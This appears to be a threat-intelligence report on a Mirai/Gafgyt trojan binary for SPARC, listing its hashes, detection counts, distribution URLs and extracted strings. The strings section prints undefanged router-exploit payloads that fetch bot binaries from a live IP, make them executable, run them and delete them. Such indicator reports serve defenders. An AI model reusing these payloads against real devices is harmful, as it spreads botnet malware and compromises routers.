c.spc

First submission 2024-09-05 01:04:02 Last sumbission 2024-09-05 01:18:02

File details

File type: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
Mime type: application/x-executable
File size: 173.77 KB (177944 bytes)
MD5: 471ca2e78136d6387eb2e8515cb88f2e
SHA1: 4ce0444381f7a7f2b1c5958b095690b6285ed8d3
SHA256: 5354dc283ac0fa5135d4a4967536f02048a8a8a1d3eb1c6eb37a869367f04f26

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 42/79 VT report date: 2024-09-05 00:48:21
Malware Type 1 trojan
Threat Type 3 mirai gafgyt bashlite

URLs, FQDN and IP indicators 3

URL Host (FQDN/IP) Date Added
hXXp://cnc.ghty.online/c.spc VirusTotal Report cnc.ghty.online VirusTotal Report 2024-09-05 01:18:04
hXXp://ydl-v2.mhdy.site/c.spc VirusTotal Report ydl-v2.mhdy.site VirusTotal Report 2024-09-05 01:17:05
hXXp://5.59.248.92/c.spc VirusTotal Report 5.59.248.92 VirusTotal Report 2024-09-05 01:04:02

Strings analysis - Possible IPs found 3

5.59.248.92
127.0.0.1
192.168.0.100

Strings analysis - Possible URLs found 13

http://5.59.248.92/Yboats.mips
http://5.59.248.92/Yboats.mips;
http://5.59.248.92/gpon443+-O+/tmp/gaf;sh+/tmp/gaf
http://5.59.248.92/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
http://5.59.248.92/Yboats.mpsl;chmod
http://5.59.248.92/adb;
http://5.59.248.92/Yboats.arm7;chmod+777+Yboats.arm7;./Yboats.arm7+zyxel.selfrep;rm+-rf+Yboats.arm7%3b%23&remoteSubmit=Save
http://schemas.xmlsoap.org/soap/envelope/
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2001/XMLSchema-instance
http://schemas.xmlsoap.org/soap/encoding/
http://5.59.248.92/Yboats.x86
http://purenetworks.com/HNAP1/